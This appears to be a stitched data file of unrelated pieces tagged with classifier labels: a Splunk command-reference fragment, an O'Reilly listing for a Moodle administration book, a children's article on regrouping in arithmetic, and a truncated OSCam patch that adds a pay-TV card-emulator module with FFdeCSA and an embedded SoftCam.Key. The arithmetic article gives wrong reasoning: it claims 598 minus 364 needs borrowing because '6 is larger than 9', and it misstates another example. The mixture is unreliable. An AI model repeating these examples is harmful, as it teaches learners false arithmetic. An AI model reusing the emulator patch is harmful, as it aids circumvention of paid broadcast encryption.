file Search the contents of the KV store collection kvstorecoll that have a CustID value greater than 500 and a CustName value that begins with the letter P. The collection is referenced in a lookup table called kvstorecoll_lookup. Using the stats command, provide a count of the events received from the table. | from inputlookup:kvstorecoll_lookup | where (CustID>500) AND (CustName="P*") | stats count 4. Retrieve data using a saved search Retrieve the timestamp and client IP from the saved search called mysecurityquery. | from savedsearch:mysecurityquery | fields _time clientip ... 5. Specify a dataset name that contains spaces When the name of a dataset includes spaces, enclose the dataset name in quotation marks. | from savedsearch:"Top five sourcetypes" See also inputlookup, datamodel PREVIOUS format   NEXT gauge This documentation applies to the following versions of Splunk® Enterprise: 6.5.0, 6.5.1, 6.5.1612 (Splunk Cloud only), 6.5.2, 6.5.3, 6.5.4, 6.5.5, 6.5.6, 6.5.7, 6.5.8, 6.5.9, 6.6.0, 6.6.1, 6.6.2, 6.6.3, 6.6.4, 6.6.5, 6.6.6, 6.6.7, 6.6.8, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.1.0, 7.1.1 Was this documentation topic helpful? Enter your email address, and someone from the documentation team will respond to you: Please provide your comments here. Ask a question or make a suggestion. You must be logged into splunk.com in order to post comments. Log in now. Please try to keep this discussion focused on the content covered in this documentation topic. If you have a more general question about Splunk functionality or are experiencing a difficulty with Splunk, consider posting a question to Splunkbase Answers. 0 out of 1000 Characters
__label__pos
0.910418
Safari, the world’s most comprehensive technology and business learning platform. Find the exact information you need to solve a problem on the fly, or go deeper to master the technologies and skills you need to succeed Start Free Trial No credit card required O'Reilly logo Moodle Administration Essentials Book Description Learn how to set up, maintain, and support your Moodle site efficiently In Detail This book begins with a brief look at Moodle's background and an examination of its architectural structure and LAMP architecture. You'll learn to create user accounts and understand the methods of authentication based on manual accounts and e-mail-based self-registrations. You'll then develop the Moodle site structure and course set up, and discover how to edit it through a sample faculty site. Next, you'll configure two of the standard themes in Moodle and apply them to organizational branding. You'll also explore how plugins are configured and installed, and learn about backing up, resetting, and restoring Moodle courses. Finally, you'll learn Moodle's security options, along with performance testing, and how to use the built-in Moodle performance testing script. What You Will Learn • Manage user accounts, authenticate users, and control user permissions with roles • Enhance your Moodle site with plugins such as activity modules, admin reports, admin tools, and more • Brand your Moodle site with configured themes • Set up the structure of your site using categories in Moodle • Prepare your site for end-of-year rollover • Install Moodle on a Linux Server • Monitor the usage and performance of your Moodle site • Downloading the example code for this book. You can download the example code files for all Packt books you have purchased from your account at http://www.PacktPub.com. If you purchased this book elsewhere, you can visit http://www.PacktPub.com/support and register to have the files e-mailed directly to you. Table of Contents 1. Moodle Administration Essentials 1. Table of Contents 2. Moodle Administration Essentials 3. Credits 4. About the Authors 5. About the Reviewers 6. www.PacktPub.com 1. Support files, eBooks, discount offers, and more 1. Why subscribe? 2. Free access for Packt account holders 7. Preface 1. What this book covers 2. What you need for this book 3. Who this book is for 4. Conventions 5. Reader feedback 6. Customer support 1. Errata 2. Piracy 3. Questions 8. 1. Moodle in a Nutshell 1. Background of Moodle 2. Architecture of Moodle 3. Installing Moodle 1. Server specifications 1. Hardware 2. Software 2. Code specifications 1. Moodle download 2. File permissions 3. Database setup 4. Moodledata directory setup 5. Moodle installer 6. Essential configurations 1. Email settings 2. System paths 3. Cron 4. Updating Moodle 1. Upgrading from one version to another 1. Cloning your Moodle site 2. Upgrade preparation 3. Moodle code directory 4. Moodle data directory 5. Moodle database 6. Moodle download 2. Maintaining the version code 3. When to update 5. Summary 9. 2. Managing User Accounts and Authentication 1. Creating users 2. Editing a user 1. Searching for a user account 2. Editing the user account 3. Uploading users 1. Preparing the spreadsheet 2. Uploading the spreadsheet 4. User authentication 1. Authentication types 2. How to enable authentication plugins 3. Authentication configuration for a single user creation 4. Authentication configuration for the CSV file user upload 5. Manual authentication 1. The optional configuration 6. Email-based self-registration authentication 1. The optional configuration 5. Summary 10. 3. Managing Categories and Courses 1. Category creation 2. Course and category management 3. Course creation 4. Uploading courses 1. Preparing the spreadsheet 2. Uploading the spreadsheet 5. Course templates 1. Restore a course 2. Clone a course 6. Summary 11. 4. Managing Site Appearance 1. Configuring the landing page 2. Configuring the front page 3. Global theme settings 4. Introducing the Clean theme 1. Configuring the Clean theme 5. Introducing the More theme 1. Configuring the More theme 6. Cloning a theme 7. Summary 12. 5. Role Management 1. Understanding terminologies 2. Standard roles 3. Managing role permissions 1. Cloning a role 2. Creating a new role 3. Creating a course requester role 4. Applying a role override for a specific context 5. Testing a role 6. Manually adding a user to a course 7. Enabling self-enrolment for a course 4. Other custom roles 5. Summary 13. 6. Managing Site Plugins 1. What are plugins? 2. Where to find plugins 3. Considerations when choosing a plugin 4. Installing plugins 1. Manually installing a plugin ZIP file 2. Installing a plugin from the Moodle plugins directory 3. Installing a plugin from a source control URL 5. Editing plugin settings 6. Updating plugins 7. Uninstalling plugins 8. Summary 14. 7. End of Year Course Rollover 1. Rollover implementation 1. Backup of the entire Moodle site 2. Duplication of courses in the same Moodle after backups 3. Resetting courses after a backup 4. Selecting the right approach 2. Course backup 1. Teacher permissions in course backup 2. Course creator permissions in course backup 3. Administrator permissions in course backup 4. Making a backup of a course 5. Setting up automated course backups 3. Course restore 1. Teacher permissions in course restore 2. Course creator permissions in course restore 3. Administrator permissions in course restore 4. Restoring a course 4. Course reset 5. Summary 15. 8. Miscellaneous Admin Tasks 1. Monitoring Moodle usage 1. Statistics 2. Reports 1. Comments 2. Backups 3. Config changes 4. Course overview 5. Events list 6. Logs 7. Live logs 8. Performance overview 9. Question instances 10. Security overview 11. Statistics 12. Event monitoring rules 13. Spam cleaner 2. Performance testing 1. JMeter 2. Performance comparison 3. Security and resilience 1. Security 2. IP Blocker 3. Site policies 4. HTTP security 5. Notifications 6. Anti-Virus 7. Security overview report 4. General considerations 1. Force users to log in 2. Disable log in as a guest 3. Enable timezones 4. Enable cron 5. Debug messages 6. Purge all caches 7. Enhancing the My Home page or Dashboard 8. Language customization 9. Enabling site administrators 10. Enabling maintenance mode 11. Support contact details 12. Administration search box 5. Summary 16. Index
__label__pos
0.999992
In the realm of mathematics, regrouping is a fundamental concept that plays a crucial role in performing operations such as addition and subtraction with multi-digit numbers. It is a strategy that allows us to manipulate numbers effectively and arrive at accurate results. In this article, we will delve into the meaning of regrouping, explore its applications, and provide step-by-step explanations along with relevant examples. So let’s embark on this mathematical journey and unlock the secrets of regrouping! Understanding Regrouping in Math Regrouping, also known as “carrying” or “borrowing,” involves rearranging digits within numbers when performing mathematical operations. It mainly comes into play when dealing with numbers that have more than one digit. The primary purpose of regrouping is to ensure accurate computations and maintain the place value system. Regrouping in Addition When adding multi-digit numbers, regrouping occurs when the sum of digits in a specific place value column exceeds nine. Let’s understand this concept with an example: Example 1: Consider the addition problem: 58 + 47. Here’s how regrouping helps us solve it: 58 + 47 ------- 105 To solve this problem, we start by adding the digits in the ones column: 8 + 7 equals 15. Since 15 is greater than nine, we regroup the ten’s value by carrying the digit 1 to the tens column. The remaining value, 5, stays in the ones column. Then, we add the digits in the tens column, including the carried value, which gives us 5 + 4 + 1, equaling 10. Finally, we write down the resulting sum, 105. Regrouping in Subtraction In subtraction, regrouping comes into play when the digit being subtracted is larger than the corresponding digit in the minuend. Let’s consider an example: Example 2: Let’s subtract 364 from 598. Regrouping is necessary in this scenario: 598 - 364 ------- 234 Starting from the ones column, we subtract 4 from 8, which gives us 4. In the tens column, we need to subtract 6 from 9. However, since 6 is larger than 9, we need to regroup. We borrow 1 from the hundreds column and increase the value of the tens column by 10, making it 19. Now, we subtract 6 from 19, resulting in 13. Finally, we subtract 3 from 5 in the hundreds column, giving us 2. Thus, the difference between 598 and 364 is 234. Teaching Regrouping in Math: A Step-by-Step Approach To ensure a thorough understanding of regrouping among students, it is crucial to follow a step-by-step teaching approach. Let’s explore three essential steps to help students grasp this concept effectively. Step 1: Introduce Manipulatives and Hands-on Experience To provide students with a concrete understanding of regrouping, begin by using manipulatives such as base-10 blocks or Montessori decimal system beads. These physical objects help students visualize the concept of tens, units, hundreds, and thousands. By engaging in hands-on activities, students can count and exchange units for tens or vice versa, gaining a tangible sense of regrouping. Step 2: Utilize Visual Representations Once students have experienced regrouping through manipulatives, introduce visual representations to aid their understanding. Visuals can include diagrams, charts, or drawings that illustrate the regrouping process. Online math programs like Happy Numbers offer interactive problems with visual cues to reinforce the concept. Visuals bridge the gap between the use of manipulatives and the eventual transition to pencil-and-paper calculations. Step 3: Progress to Traditional Methods After students have gained proficiency with manipulatives and visual representations, gradually introduce them to traditional pencil-and-paper methods of performing regrouping operations. Emphasize the importance of place value and guide them through the step-by-step procedures. Practice problems with varying difficulty levels will help solidify their understanding and enhance their computational skills. Importance of Regrouping in Real-Life Situations Regrouping is not limited to mathematical exercises; its applications extend beyond the classroom into real-life situations. Let’s explore a few instances where regrouping is relevant: Financial Transactions Regrouping becomes essential when handling monetary transactions involving large sums of money. For instance, when calculating the total cost of groceries, if the units exceed nine, regrouping is necessary to accurately determine the total amount. Time Management Regrouping plays a role in time management as well. When scheduling appointments or allocating time for various activities, regrouping can help ensure efficient utilization of time slots and effective time management. Data Analysis In fields such as statistics, regrouping aids in organizing and analyzing data. Grouping data into categories or intervals allows for better visualization and comprehension of information. Conclusion Regrouping is a fundamental concept in mathematics that enables us to perform accurate calculations, understand place value, and solve complex problems. By following a systematic teaching approach and providing students with manipulatives, visuals, and practice opportunities, we can help them develop a deep conceptual understanding of regrouping. The applications of regrouping extend beyond the math classroom, enhancing financial literacy, time management, and data analysis skills. So, embrace the power of regrouping and unlock the potential for mathematical success! FAQ What are some common examples of regrouping in math? ne common example of regrouping in math is when adding two-digit numbers, such as 48 + 37. Here, regrouping occurs when adding the ones column because 8 + 7 equals 15, which is greater than 9. So, we regroup the 10s by carrying over the value to the 10s column and write down the units. Another example is in subtraction, where regrouping is necessary when subtracting numbers with larger digits in the same place value. For instance, subtracting 209 from 395 requires regrouping in both the tens and ones columns. Are there different methods of regrouping in math? Yes, there are different methods of regrouping in math. The most commonly used methods are the traditional method, which involves carrying or borrowing digits when performing addition or subtraction, and the expanded form method, where numbers are expanded into their place value components and regrouping is done based on the values of the digits. How can regrouping be applied to addition and subtraction problems? Regrouping is applied in addition when the sum of digits in a column is greater than 9. In such cases, we carry the excess value to the next higher place value column. For subtraction, regrouping is required when the digit being subtracted is larger than the corresponding digit in the minuend. We borrow from the higher place value column to adjust the value and ensure accurate subtraction. How does regrouping relate to place value in mathematics? Regrouping is closely tied to the concept of place value in mathematics. It involves rearranging or exchanging digits within numbers to maintain the value of each digit based on its position or place value. By regrouping, we ensure that the value of each digit is correctly represented within the number, thereby preserving the place value system. Are there any online resources or apps for practicing regrouping in math? Yes, there are several online resources and apps available for practicing regrouping in math. Some popular options include educational websites like Khan Academy, MathPlayground, and SplashLearn, which offer interactive games, worksheets, and tutorials specifically designed to help students practice regrouping. Additionally, educational math apps such as Happy Numbers and Mathletics also provide regrouping practice modules to enhance learning and understanding. Opt out or Contact us anytime. See our Privacy Notice Follow us on Reddit for more insights and updates. Comments (0) Welcome to A*Help comments! We’re all about debate and discussion at A*Help. We value the diverse opinions of users, so you may find points of view that you don’t agree with. And that’s cool. However, there are certain things we’re not OK with: attempts to manipulate our data in any way, for example, or the posting of discriminative, offensive, hateful, or disparaging material. Your email address will not be published. Required fields are marked * Login Register | Lost your password?
__label__pos
0.999949
Project General Profile oscam-emu.11384.patch Joe User, 2017-06-15 00:51 View differences: CMakeLists.txt (working copy) 101 101 ${CMAKE_CURRENT_SOURCE_DIR}/csctapi 102 102 ${CMAKE_CURRENT_SOURCE_DIR}/cscrypt 103 103 ${CMAKE_CURRENT_SOURCE_DIR}/minilzo 104 ${CMAKE_CURRENT_SOURCE_DIR}/ffdecsa 104 105 ${CMAKE_CURRENT_SOURCE_DIR}/extapi/cygwin 105 106 /usr/include/w32api 106 107 ${OPTIONAL_INCLUDE_DIR} ...... 110 111 ${CMAKE_CURRENT_SOURCE_DIR}/csctapi 111 112 ${CMAKE_CURRENT_SOURCE_DIR}/cscrypt 112 113 ${CMAKE_CURRENT_SOURCE_DIR}/minilzo 114 ${CMAKE_CURRENT_SOURCE_DIR}/ffdecsa 113 115 ${OPTIONAL_INCLUDE_DIR} 114 116 ) 115 117 endif (OSCamOperatingSystem MATCHES "Windows/Cygwin") ...... 420 422 # Manage config.h based on command line parameters 421 423 # Manipulate config file based on given parameters and read unset parameters 422 424 425 execute_process (COMMAND ${CMAKE_CURRENT_SOURCE_DIR}/config.sh --enabled WITH_EMU OUTPUT_VARIABLE CONFIG_WITH_EMU OUTPUT_STRIP_TRAILING_WHITESPACE) 426 if (CONFIG_WITH_EMU MATCHES "Y" AND NOT WITH_EMU EQUAL 1) 427 add_definitions ("-DWITH_EMU") 428 set (WITH_EMU "1") 429 message(STATUS " EMU is added by config compiling with EMU") 430 endif(CONFIG_WITH_EMU MATCHES "Y" AND NOT WITH_EMU EQUAL 1) 431 423 432 execute_process (COMMAND ${CMAKE_CURRENT_SOURCE_DIR}/config.sh --show-valid OUTPUT_VARIABLE config_vars_string OUTPUT_STRIP_TRAILING_WHITESPACE) 424 433 string(REGEX MATCHALL "[A-Z0-9_]+" config_vars ${config_vars_string}) 425 434 ...... 449 458 add_subdirectory (csctapi) 450 459 add_subdirectory (minilzo) 451 460 add_subdirectory (cscrypt) 461 add_subdirectory (ffdecsa) 452 462 453 463 #----------------------- file groups ------------------------------ 454 464 execute_process (COMMAND ${CMAKE_CURRENT_SOURCE_DIR}/config.sh --enabled MODULE_CAMD33 OUTPUT_VARIABLE CAMD33 OUTPUT_STRIP_TRAILING_WHITESPACE) ...... 498 508 499 509 set (exe_name "oscam") 500 510 add_executable (${exe_name} ${exe_srcs} ${exe_hdrs}) 501 target_link_libraries (${exe_name} ${csoscam} ${csmodules} ${csreaders} csctapi cscrypt minilzo) 511 target_link_libraries (${exe_name} ${csoscam} ${csmodules} ${csreaders} csctapi cscrypt minilzo ffdecsa) 502 512 if(HAVE_LIBRT AND HAVE_LIBUSB) 503 513 if (LIBUSBDIR) 504 514 set (libusb_link "imp_libusb") ...... 647 657 execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpmachine COMMAND tr -d '\n' OUTPUT_VARIABLE CS_TARGET) 648 658 add_definitions ("-D'CS_TARGET=\"${CS_TARGET}\"'") 649 659 #----------------------- global compile and link options ------------------------------ 660 #enable sse2 on x86 661 if (CMAKE_SYSTEM_PROCESSOR MATCHES "(x86)|(X86)|(amd64)|(AMD64)") 662 set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -msse -msse2 -msse3") 663 endif (CMAKE_SYSTEM_PROCESSOR MATCHES "(x86)|(X86)|(amd64)|(AMD64)") 664 650 665 # disable warning about unused but set variables in gcc 4.6+ 651 666 if (CMAKE_COMPILER_IS_GNUCC) 652 667 execute_process(COMMAND ${CMAKE_C_COMPILER} -dumpversion OUTPUT_VARIABLE GCC_VERSION) ...... 731 746 732 747 #-------------------------------------------------------------------------------- 733 748 749 if (NOT OSCamOperatingSystem MATCHES "Mac OS X") 750 if (NOT DEFINED ENV{ANDROID_NDK}) 751 if (NOT DEFINED ENV{ANDROID_STANDALONE_TOOLCHAIN}) 752 if(WITH_EMU) 753 if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/SoftCam.Key) 754 execute_process(COMMAND cp ${CMAKE_CURRENT_SOURCE_DIR}/SoftCam.Key ${CMAKE_CURRENT_BINARY_DIR}/SoftCam.Key) 755 else(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/SoftCam.Key) 756 execute_process(COMMAND touch ${CMAKE_CURRENT_BINARY_DIR}/SoftCam.Key) 757 endif(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/SoftCam.Key) 758 execute_process(COMMAND touch ${CMAKE_CURRENT_BINARY_DIR}/utils/SoftCam.Key) 759 set (CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -Wl,--format=binary -Wl,SoftCam.Key -Wl,--format=default" ) 760 endif(WITH_EMU) 761 endif (NOT DEFINED ENV{ANDROID_STANDALONE_TOOLCHAIN}) 762 endif (NOT DEFINED ENV{ANDROID_NDK}) 763 endif (NOT OSCamOperatingSystem MATCHES "Mac OS X") 764 734 765 #----------------------- installation ----------------------------- 735 766 736 767 file (GLOB config_files "${CMAKE_CURRENT_SOURCE_DIR}/Distribution/oscam.*") ...... 819 850 endif(STATICLIBUSB AND NOT LIBUSBDIR) 820 851 endif (HAVE_LIBUSB) 821 852 853 if (WITH_EMU) 854 message(STATUS " Compile with EMU support") 855 endif (WITH_EMU) 856 822 857 message (STATUS "") Makefile (working copy) 65 65 66 66 LDFLAGS = -Wl,--gc-sections 67 67 68 TARGETHELP := $(shell $(CC) --target-help 2>&1) 69 ifneq (,$(findstring sse2,$(TARGETHELP))) 70 override CFLAGS += -fexpensive-optimizations -mmmx -msse -msse2 -msse3 71 else 72 override CFLAGS += -fexpensive-optimizations 73 endif 74 68 75 # The linker for powerpc have bug that prevents --gc-sections from working 69 76 # Check for the linker version and if it matches disable --gc-sections 70 77 # For more information about the bug see: ...... 268 275 SRC-$(CONFIG_MODULE_CCCAM) += module-cccam.c 269 276 SRC-$(CONFIG_MODULE_CCCSHARE) += module-cccshare.c 270 277 SRC-$(CONFIG_MODULE_CONSTCW) += module-constcw.c 278 SRC-$(CONFIG_WITH_EMU) += module-emulator.c 279 SRC-$(CONFIG_WITH_EMU) += module-emulator-osemu.c 280 SRC-$(CONFIG_WITH_EMU) += module-emulator-stream.c 281 SRC-$(CONFIG_WITH_EMU) += ffdecsa/ffdecsa.c 282 UNAME := $(shell uname -s) 283 ifneq ($(UNAME),Darwin) 284 ifndef ANDROID_NDK 285 ifndef ANDROID_STANDALONE_TOOLCHAIN 286 ifeq "$(CONFIG_WITH_EMU)" "y" 287 TOUCH_SK := $(shell touch SoftCam.Key) 288 override LDFLAGS += -Wl,--format=binary -Wl,SoftCam.Key -Wl,--format=default 289 endif 290 endif 291 endif 292 endif 271 293 SRC-$(CONFIG_CS_CACHEEX) += module-csp.c 272 294 SRC-$(CONFIG_CW_CYCLE_CHECK) += module-cw-cycle-check.c 273 295 SRC-$(CONFIG_WITH_AZBOX) += module-dvbapi-azbox.c ...... 365 387 # starts the compilation. 366 388 all: 367 389 @./config.sh --use-flags "$(USE_FLAGS)" --objdir "$(OBJDIR)" --make-config.mak 368 @-mkdir -p $(OBJDIR)/cscrypt $(OBJDIR)/csctapi $(OBJDIR)/minilzo $(OBJDIR)/webif 390 @-mkdir -p $(OBJDIR)/cscrypt $(OBJDIR)/csctapi $(OBJDIR)/minilzo $(OBJDIR)/ffdecsa $(OBJDIR)/webif 369 391 @-printf "\ 370 392 +-------------------------------------------------------------------------------\n\ 371 393 | OSCam ver: $(VER) rev: $(SVN_REV) target: $(TARGET)\n\ config.h (working copy) 1 1 #ifndef CONFIG_H_ 2 2 #define CONFIG_H_ 3 3 4 #define WITH_EMU 1 4 5 #define WEBIF 1 5 6 #define WEBIF_LIVELOG 1 6 7 #define WEBIF_JQUERY 1 config.sh (working copy) 1 1 #!/bin/sh 2 2 3 addons="WEBIF WEBIF_LIVELOG WEBIF_JQUERY TOUCH WITH_SSL HAVE_DVBAPI READ_SDT_CHARSETS IRDETO_GUESSING CS_ANTICASC WITH_DEBUG MODULE_MONITOR WITH_LB CS_CACHEEX CW_CYCLE_CHECK LCDSUPPORT LEDSUPPORT CLOCKFIX IPV6SUPPORT" 3 addons="WEBIF WEBIF_LIVELOG WEBIF_JQUERY TOUCH WITH_SSL HAVE_DVBAPI READ_SDT_CHARSETS IRDETO_GUESSING CS_ANTICASC WITH_DEBUG MODULE_MONITOR WITH_LB CS_CACHEEX CW_CYCLE_CHECK LCDSUPPORT LEDSUPPORT CLOCKFIX IPV6SUPPORT WITH_EMU" 4 4 protocols="MODULE_CAMD33 MODULE_CAMD35 MODULE_CAMD35_TCP MODULE_NEWCAMD MODULE_CCCAM MODULE_CCCSHARE MODULE_GBOX MODULE_RADEGAST MODULE_SCAM MODULE_SERIAL MODULE_CONSTCW MODULE_PANDORA MODULE_GHTTP" 5 5 readers="READER_NAGRA READER_IRDETO READER_CONAX READER_CRYPTOWORKS READER_SECA READER_VIACCESS READER_VIDEOGUARD READER_DRE READER_TONGFANG READER_BULCRYPT READER_GRIFFIN READER_DGCRYPT" 6 6 card_readers="CARDREADER_PHOENIX CARDREADER_INTERNAL CARDREADER_SC8IN1 CARDREADER_MP35 CARDREADER_SMARGO CARDREADER_DB2COM CARDREADER_STAPI CARDREADER_STAPI5 CARDREADER_STINGER CARDREADER_DRECAS" ...... 24 24 # CONFIG_LEDSUPPORT=n 25 25 CONFIG_CLOCKFIX=y 26 26 # CONFIG_IPV6SUPPORT=n 27 CONFIG_WITH_EMU=y 27 28 # CONFIG_MODULE_CAMD33=n 28 29 CONFIG_MODULE_CAMD35=y 29 30 CONFIG_MODULE_CAMD35_TCP=y ...... 289 290 290 291 update_deps() { 291 292 # Calculate dependencies 292 enabled_any $(get_opts readers) $(get_opts card_readers) && enable_opt WITH_CARDREADER >/dev/null 293 disabled_all $(get_opts readers) $(get_opts card_readers) && disable_opt WITH_CARDREADER >/dev/null 293 enabled_any $(get_opts readers) $(get_opts card_readers) WITH_EMU && enable_opt WITH_CARDREADER >/dev/null 294 disabled_all $(get_opts readers) $(get_opts card_readers) WITH_EMU && disable_opt WITH_CARDREADER >/dev/null 294 295 disabled WEBIF && disable_opt WEBIF_LIVELOG >/dev/null 295 296 disabled WEBIF && disable_opt WEBIF_JQUERY >/dev/null 296 297 enabled MODULE_CCCSHARE && enable_opt MODULE_CCCAM >/dev/null 297 298 enabled_any CARDREADER_DB2COM CARDREADER_MP35 CARDREADER_SC8IN1 CARDREADER_STINGER && enable_opt CARDREADER_PHOENIX >/dev/null 299 enabled WITH_EMU && enable_opt READER_VIACCESS >/dev/null 300 enabled WITH_EMU && enable_opt READER_DRE >/dev/null 301 enabled WITH_EMU && enable_opt MODULE_NEWCAMD >/dev/null 298 302 } 299 303 300 304 list_config() { ...... 344 348 not_have_flag USE_LIBCRYPTO && echo "CONFIG_LIB_AES=y" || echo "# CONFIG_LIB_AES=n" 345 349 enabled MODULE_CCCAM && echo "CONFIG_LIB_RC6=y" || echo "# CONFIG_LIB_RC6=n" 346 350 not_have_flag USE_LIBCRYPTO && enabled MODULE_CCCAM && echo "CONFIG_LIB_SHA1=y" || echo "# CONFIG_LIB_SHA1=n" 347 enabled_any READER_DRE MODULE_SCAM READER_VIACCESS && echo "CONFIG_LIB_DES=y" || echo "# CONFIG_LIB_DES=n" 348 enabled_any MODULE_CCCAM READER_NAGRA READER_SECA && echo "CONFIG_LIB_IDEA=y" || echo "# CONFIG_LIB_IDEA=n" 349 not_have_flag USE_LIBCRYPTO && enabled_any READER_CONAX READER_CRYPTOWORKS READER_NAGRA && echo "CONFIG_LIB_BIGNUM=y" || echo "# CONFIG_LIB_BIGNUM=n" 351 enabled_any READER_DRE MODULE_SCAM READER_VIACCESS WITH_EMU && echo "CONFIG_LIB_DES=y" || echo "# CONFIG_LIB_DES=n" 352 enabled_any MODULE_CCCAM READER_NAGRA READER_SECA WITH_EMU && echo "CONFIG_LIB_IDEA=y" || echo "# CONFIG_LIB_IDEA=n" 353 not_have_flag USE_LIBCRYPTO && enabled_any READER_CONAX READER_CRYPTOWORKS READER_NAGRA WITH_EMU && echo "CONFIG_LIB_BIGNUM=y" || echo "# CONFIG_LIB_BIGNUM=n" 350 354 } 351 355 352 356 make_config_c() { ...... 457 461 LEDSUPPORT "LED support" $(check_test "LEDSUPPORT") \ 458 462 CLOCKFIX "Clockfix (disable on old systems!)" $(check_test "CLOCKFIX") \ 459 463 IPV6SUPPORT "IPv6 support (experimental)" $(check_test "IPV6SUPPORT") \ 464 WITH_EMU "Emulator support" $(check_test "WITH_EMU") \ 460 465 2> ${tempfile} 461 466 462 467 opt=${?} cscrypt/md5.c (working copy) 25 25 26 26 #if !defined(WITH_SSL) && !defined(WITH_LIBCRYPTO) 27 27 28 typedef struct MD5Context 29 { 30 uint32_t buf[4]; 31 uint32_t bits[2]; 32 uint32_t in[16]; 33 } MD5_CTX; 34 35 28 #ifdef __i386__ 36 29 #define byteReverse(a, b) 37 30 #else ...... 155 148 * Start MD5 accumulation. Set bit count to 0 and buffer to mysterious 156 149 * initialization constants. 157 150 */ 158 static void MD5_Init(MD5_CTX *ctx) 151 void MD5_Init(MD5_CTX *ctx) 159 152 { 160 153 ctx->buf[0] = 0x67452301; 161 154 ctx->buf[1] = 0xefcdab89; ...... 170 163 * Update context to reflect the concatenation of another buffer full 171 164 * of bytes. 172 165 */ 173 static void MD5_Update(MD5_CTX *ctx, const unsigned char *buf, unsigned int len) 166 void MD5_Update(MD5_CTX *ctx, const unsigned char *buf, unsigned int len) 174 167 { 175 168 uint32_t t; 176 169 ...... 219 212 * Final wrapup - pad to 64-byte boundary with the bit pattern 220 213 * 1 0* (64-bit count of bits processed, MSB-first) 221 214 */ 222 static void MD5_Final(unsigned char digest[MD5_DIGEST_LENGTH], MD5_CTX *ctx) 215 void MD5_Final(unsigned char digest[MD5_DIGEST_LENGTH], MD5_CTX *ctx) 223 216 { 224 217 unsigned count; 225 218 unsigned char *p; cscrypt/md5.h (working copy) 7 7 #define MD5_DIGEST_LENGTH 16 8 8 9 9 unsigned char *MD5(const unsigned char *input, unsigned long len, unsigned char *output_hash); 10 #endif 11 10 12 char *__md5_crypt(const char *text_pass, const char *salt, char *crypted_passwd); 11 typedef struct MD5Context { 12 uint32_t buf[4]; 13 uint32_t bits[2]; 14 uint32_t in[16]; 15 } MD5_CTX; 13 16 17 void MD5_Init(MD5_CTX *ctx); 18 void MD5_Update(MD5_CTX *ctx, const unsigned char *buf, unsigned int len); 19 void MD5_Final(unsigned char digest[MD5_DIGEST_LENGTH], MD5_CTX *ctx); 14 20 #endif 21 char *__md5_crypt(const char *text_pass, const char *salt, char *crypted_passwd); 22 #endif csctapi/cardreaders.h (working copy) 14 14 extern const struct s_cardreader cardreader_stapi; 15 15 extern const struct s_cardreader cardreader_stinger; 16 16 extern const struct s_cardreader cardreader_drecas; 17 extern const struct s_cardreader cardreader_emu; 17 18 18 19 #endif ffdecsa/CMakeLists.txt (working copy) 1 project (ffdecsa) 2 3 file (GLOB ffdecsa_srcs "ffdecsa.c") 4 file (GLOB ffdecsa_hdrs "*.h") 5 6 set (lib_name "ffdecsa") 7 8 add_library (${lib_name} STATIC ${ffdecsa_srcs} ${ffdecsa_hdrs}) ffdecsa/COPYING (working copy) 1 GNU GENERAL PUBLIC LICENSE 2 Version 2, June 1991 3 4 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 675 Mass Ave, Cambridge, MA 02139, USA 6 Everyone is permitted to copy and distribute verbatim copies 7 of this license document, but changing it is not allowed. 8 9 Preamble 10 11 The licenses for most software are designed to take away your 12 freedom to share and change it. By contrast, the GNU General Public 13 License is intended to guarantee your freedom to share and change free 14 software--to make sure the software is free for all its users. This 15 General Public License applies to most of the Free Software 16 Foundation's software and to any other program whose authors commit to 17 using it. (Some other Free Software Foundation software is covered by 18 the GNU Library General Public License instead.) You can apply it to 19 your programs, too. 20 21 When we speak of free software, we are referring to freedom, not 22 price. Our General Public Licenses are designed to make sure that you 23 have the freedom to distribute copies of free software (and charge for 24 this service if you wish), that you receive source code or can get it 25 if you want it, that you can change the software or use pieces of it 26 in new free programs; and that you know you can do these things. 27 28 To protect your rights, we need to make restrictions that forbid 29 anyone to deny you these rights or to ask you to surrender the rights. 30 These restrictions translate to certain responsibilities for you if you 31 distribute copies of the software, or if you modify it. 32 33 For example, if you distribute copies of such a program, whether 34 gratis or for a fee, you must give the recipients all the rights that 35 you have. You must make sure that they, too, receive or can get the 36 source code. And you must show them these terms so they know their 37 rights. 38 39 We protect your rights with two steps: (1) copyright the software, and 40 (2) offer you this license which gives you legal permission to copy, 41 distribute and/or modify the software. 42 43 Also, for each author's protection and ours, we want to make certain 44 that everyone understands that there is no warranty for this free 45 software. If the software is modified by someone else and passed on, we 46 want its recipients to know that what they have is not the original, so 47 that any problems introduced by others will not reflect on the original 48 authors' reputations. 49 50 Finally, any free program is threatened constantly by software 51 patents. We wish to avoid the danger that redistributors of a free 52 program will individually obtain patent licenses, in effect making the 53 program proprietary. To prevent this, we have made it clear that any 54 patent must be licensed for everyone's free use or not licensed at all. 55 56 The precise terms and conditions for copying, distribution and 57 modification follow. 58 59 GNU GENERAL PUBLIC LICENSE 60 TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 62 0. This License applies to any program or other work which contains 63 a notice placed by the copyright holder saying it may be distributed 64 under the terms of this General Public License. The "Program", below, 65 refers to any such program or work, and a "work based on the Program" 66 means either the Program or any derivative work under copyright law: 67 that is to say, a work containing the Program or a portion of it, 68 either verbatim or with modifications and/or translated into another 69 language. (Hereinafter, translation is included without limitation in 70 the term "modification".) Each licensee is addressed as "you". 71 72 Activities other than copying, distribution and modification are not 73 covered by this License; they are outside its scope. The act of 74 running the Program is not restricted, and the output from the Program 75 is covered only if its contents constitute a work based on the 76 Program (independent of having been made by running the Program). 77 Whether that is true depends on what the Program does. 78 79 1. You may copy and distribute verbatim copies of the Program's 80 source code as you receive it, in any medium, provided that you 81 conspicuously and appropriately publish on each copy an appropriate 82 copyright notice and disclaimer of warranty; keep intact all the 83 notices that refer to this License and to the absence of any warranty; 84 and give any other recipients of the Program a copy of this License 85 along with the Program. 86 87 You may charge a fee for the physical act of transferring a copy, and 88 you may at your option offer warranty protection in exchange for a fee. 89 90 2. You may modify your copy or copies of the Program or any portion 91 of it, thus forming a work based on the Program, and copy and 92 distribute such modifications or work under the terms of Section 1 93 above, provided that you also meet all of these conditions: 94 95 a) You must cause the modified files to 